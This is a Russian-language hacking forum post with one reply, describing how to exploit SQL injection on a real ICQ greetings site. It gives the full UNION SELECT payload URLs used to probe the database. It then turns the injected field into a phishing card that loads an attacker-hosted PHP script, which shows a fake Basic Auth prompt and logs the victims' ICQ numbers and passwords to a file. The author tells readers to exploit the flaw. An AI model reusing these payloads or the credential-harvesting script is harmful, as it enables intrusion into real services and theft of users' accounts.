используем уязвимость на Icq.com ICQ# через ICQ.COM Вводное слово: Статьи писать, дело неблагодарное. С одной стороны для людей продвинутых написанное является бояном и не достойным внимания, с другой стороны для начинающих «хакеров» многое кажется непонятным, в конце концов, и те и те остаются недовольны, а найти золотую середину может или педагог или писатель, коими я не являюсь, так что не судите строго В статье будут ссылки на статьи: [cash] Проведение Инъекций в MSSQL сервер от Microsoft. http://forum.antichat.ru/thread30501.html NOmeR1 Заходим в Icq через Xss: http://forum.antichat.ru/thread53850.html hidden Применение Basic Authorization против форумов: http://forum.antichat.ru/showthread.php?t=20911 А также советую посмотреть различные статьи по XSS Приступим: Как то давно, блуждая по ICQ.com набрел я на sql инъекцию, правда инъекция была бесполезной т.к. ограничивалась только 11-ю символами, но факт наличия инъекции обрадовал, значит не все потеряно, гуляя по ссылкам я набрел вот на это: Code: http://greetings.icq.com/greetings/cards/254/ http://greetings.icq.com/greetings/cards/254-1/ http://greetings.icq.com/greetings/cards/253/ Наличие инъекта налицо, подобрав кол-во столбцов с помощью order by я узнал что их 19: Code: http://greetings.icq.com/greetings/cards/253 order by 19/ сотавив sql запрос с конструкцией UNION SELECT: Code: http://greetings.icq.com/greetings/cards/253 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--/ я и не рассчитывал на успех (действительно наивно предполагать что icq.com работает на mysql, который демократичен к типам полей), предположив, что я имею дело с TransactSQL я составил запрос: Code: http://greetings.icq.com/greetings/cards/253 union select null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null--/ Как я и ожидал, ошибки не было, дело за малым, подобрать типы полей, сначала числовые, для этого нужно поочередно вместо каждого null подставлять число например 1, и там где не будет ошибки (у нас редирект) там и будет числовое поле: Code: http://greetings.icq.com/greetings/cards/-253 union select null,null,null,null,null,null,null,null,[b][u]1[/u][/b],null,null,null,null,null,null,null,null,null,null--/ видим, что значение raters у нас с 0 изменилось на 1, после того как я подобрал все числовые поля пришло время подбирать строки, для этого можно (рекомендую) изначально использовать строки без кавычек, а попросту захексить, например пресловутое 0x3a: Code: http://greetings.icq.com/greetings/cards/-253 union select null,[b][u]0x3a[/u][/b],null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/ в принципе одного поля вполне достаточно, но можно подобрать и все, далее просто узнаем версию и все остальное с помощью стандартных TSQL функций: Code: http://greetings.icq.com/greetings/cards/-253 union select null,@@version,null,null,null,null,null,null,1,null,null,null,null,null,null,null,null,null,null--/ Угу, SYBASE ASE 15.0.1 Дабы искушать начинающих на изучение инъекций в TSQL не буду приводить дальнейшие действия, как например получение схемы БД и т.д. скажу только что для просмотра «самой интересной» базы прав пользователя не хватает, при раскручивании инъекции очень поможет статья [cash]`а Проведение Инъекций в MSSQL сервер от Microsoft. т.к. SYBASE и MSSQL очень похожи. К тому же цель данной статьи немного другая. Продолжаем: Искав выгоду и другие инъекции, я нашел такую интересную штуку: Code: http://greetings.icq.com/greetings/cards/169-1/send#send_scope отсылку поздравительных карточек на почту или на icq номер. Сразу скажу что для этого надо авторизоваться на сайте и советую под левым номером, благо дело регистрация труда не составляет и времени не отнимет. Ну так вот, проделав вышеописанные действия для получения кол-ва и типов полей я узнал вот что: Code: http://greetings.icq.com/greetings/cards/-169 union select 0x3a3a3a,0x3a,0x55,111,111,111--/send#send_scope т.е. первое поле в запросе отвечает за адрес картинки/flash-объекта. Отослав с помощь формы полученное себе на мыло я получил письмо от ICQ Greetings <[email protected]>: Проследовав по ссылке я увидел то, что и должен был увидеть. Вспомнив статью hidden`а Применение Basic Authorization против форумов я написал скрипт и залил его на сервер, скрипт такой: PHP: <?php header("Content-type: image/png"); $im = ImageCreateFromPng("1.PNG"); $fp1 = fopen("time.txt", "a+"); fputs($fp1, date("F j, Y, H:i",time())."\n"); fclose($fp1); $login = $_SERVER['PHP_AUTH_USER']; $pass = $_SERVER['PHP_AUTH_PW']; if ((strlen($login)<5) || (strlen($login)>9)||(strlen($pass)<4)) { Header('HTTP/1.1 401 Unauthorized'); Header('WWW-Authenticate: Basic realm="Enter ICQ# and password"'); $im = ImageCreateFromPng("2.PNG"); } else { $content=$login.':'.$pass."\n"; $fp = fopen("log.txt", "a+"); fputs($fp, $content); fclose($fp); } imagepng($im); imagedestroy($im); ?> полностью скрипт пояснять я не буду, т.к. все отлично написано в статье hidden`а, скажу лишь, что 1.PNG это рисунок высотой 407 и шириной 610 пикселей с поздравительным изображением (для меньшего палева), 2.PNG – рисунок с такими же размерами, с белым фоном и надписью красного цвета: в файл time.txt будет записано время заходов на эту картинку, в log.txt логины и пароли. называем скрипт например 1.php и захексим полный путь до скрипта: http://site/1.php -> 0x687474703A2F2F736974652F312E706870 дальше просто вставляем это в первое поле инъекта и отправляем жертве: Code: http://greetings.icq.com/greetings/cards/-169 union select 0x687474703A2F2F736974652F312E706870,0x3a,0x55,111,111,111--/send#send_scope жертва получит письмо с содержанием, которое я описал выше, и при переходе по ссылке увидит окно Basic Authorization c просьбой ввести номер icq и пароль. Заканчиваем: Да немного народу на это ведется но и фантазия Соц. инженеров безгранична, особенно сейчас, когда стали модны социальные сети, например можно сделать редирект на фейк, который описал в своей статье Заходим в Icq через Xss NOmeR1. Вобщем мое дело показать, ваше дело эксплуатировать. Спасибо за прочтение. Scipio
вобще там около 5 скулей я нашел или больше, реально сервис бажный, жалко только прав маловато, но при определенном умении и из этого можно кое что выжать